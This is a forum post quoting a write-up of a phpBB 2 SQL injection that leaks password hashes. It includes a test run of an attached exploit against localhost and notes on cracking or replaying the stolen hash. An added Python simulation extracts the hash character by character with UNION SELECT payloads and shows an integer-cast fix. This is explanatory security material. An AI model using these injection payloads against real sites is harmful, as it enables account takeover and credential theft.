Taken From RootSecure.net
Quote
The post contains ingenious proof-of-concept code to circumvent phpBB's built-in security measures, specifically the fact that, with this vulnerability, only integers can be passed back to the client. In this case the MD5 password hash of a specific user is passed back one character at a time.
The attack was found to be successful when carried out against a test machine set up running mysql Ver 12.20 Distrib 4.0.13, however only when PHP was configured with the register_globals variable set to on - a common configuration on most web servers, which will hopefully be eradicated with the increased implementation of PHP 4 (which defaults to register_globals = off).
For the test scenario a user was registered on the phpBB board with username test and password test123. The MD5 hash of test123 (cc03e747a6afbbcbf8be7668acfebee5) was obtained by executing the following Perl code:
use strict;
use warnings;
use Digest::MD5 qw(md5_hex);
# hex-encoded MD5 of the known test password, for comparison with the extracted hash
my $digest = md5_hex("test123");
print "$digest\n";
Next, the provided exploit code was run using the following command:
perl phpsqlexploit.pl localhost http://localhost/phpBB2/viewtopic.php 3
which issued the response:
Trying to get password hash for uid 3 server localhost dbtype: mysql4
MD5 Hash for uid 3 is cc03e747a6afbbcbf8be7668acfebee5
Note: The MD5 hash obtained from the exploit can be seen to match the known hash for the password test123.
Once obtained by the attacker, the MD5 password hash can be used in two main ways. An attempt can be made to brute-force it (a 7-character password on a reasonable-spec machine would take a couple of hours), or it can be inserted into a custom-made HTTP GET request - both methods lead to successful compromise of a phpBB user account.
Actual log entries obtained from a successful attack, along with the raw HTML traffic sent back by the client, are available for download from: content/temp/phpbb_sql_int_inqection.txt
Attached File(s)
phpbb_sql.pl (3.97K)
Number of downloads: 442
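The integer-only extraction the quoted post describes, as an added example that is not part of the original post or of the phpbb_sql.pl attachment: a Python simulation of an injectable integer lookup beside its hardened form, with the attacker recovering the MD5 hash one character at a time by UNIONing the ordinal of each character into the integer column the page echoes back. The table and column names, the reflected forum_id column, and the use of SQLite's unicode()/substr() in place of MySQL's ORD()/SUBSTRING() are assumptions for illustration; the real phpBB 2 query is not reproduced.

```python
import hashlib
import sqlite3


def build_db():
    """Constructed fixture standing in for the phpBB users and topics tables
    (names assumed, not copied from phpBB); uid 3 is the test/test123 user."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE phpbb_users (user_id INTEGER, username TEXT, user_password TEXT)")
    db.execute("CREATE TABLE phpbb_topics (topic_id INTEGER, forum_id INTEGER)")
    db.execute("INSERT INTO phpbb_users VALUES (3, 'test', ?)",
               (hashlib.md5(b"test123").hexdigest(),))
    db.execute("INSERT INTO phpbb_topics VALUES (1, 7)")
    db.commit()
    return db


def viewtopic_vulnerable(db, topic_id):
    """Injectable lookup: the request parameter (what register_globals hands the
    script unvalidated) is concatenated into SQL, and only one integer column
    (forum_id, assumed here) ever reaches the client."""
    sql = f"SELECT forum_id FROM phpbb_topics WHERE topic_id = {topic_id}"
    row = db.execute(sql).fetchone()
    return int(row[0]) if row and row[0] is not None else None


def viewtopic_fixed(db, topic_id):
    """Hardened form: reject anything that is not an integer, then bind it."""
    try:
        tid = int(topic_id)
    except (TypeError, ValueError):
        return None
    row = db.execute("SELECT forum_id FROM phpbb_topics WHERE topic_id = ?", (tid,)).fetchone()
    return int(row[0]) if row and row[0] is not None else None


def leak_hash(query, user_id, max_len=32):
    """Recover user_password through an integer-only channel, one character per
    request. Each probe disables the real row (topic_id = -1) and UNIONs in the
    ordinal of the pos-th hash character, which the page then echoes as the
    'forum_id'. SQLite's unicode(substr(...)) plays the role of MySQL's
    ORD(SUBSTRING(...)); both are 1-indexed."""
    chars = []
    for pos in range(1, max_len + 1):
        payload = (f"-1 UNION SELECT unicode(substr(user_password,{pos},1)) "
                   f"FROM phpbb_users WHERE user_id={int(user_id)}")
        code = query(payload)
        if code is None:          # no row / NULL past the end of the string / input rejected
            break
        chars.append(chr(code))
    return "".join(chars)


def demo():
    """Run the extraction against both endpoints; returns (leaked, leaked_from_fixed)."""
    db = build_db()
    leaked = leak_hash(lambda p: viewtopic_vulnerable(db, p), 3)
    blocked = leak_hash(lambda p: viewtopic_fixed(db, p), 3)
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print(f"MD5 Hash for uid 3 is {leaked}")
    print(f"Against the fixed endpoint: {blocked!r}")
```

The loop needs exactly 32 requests because each probe returns one whole character value rather than a yes/no answer; a purely boolean channel would need several requests per character. The integer cast in viewtopic_fixed is what closes the hole, since no string payload survives int(); binding the parameter is defence in depth on top of that.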
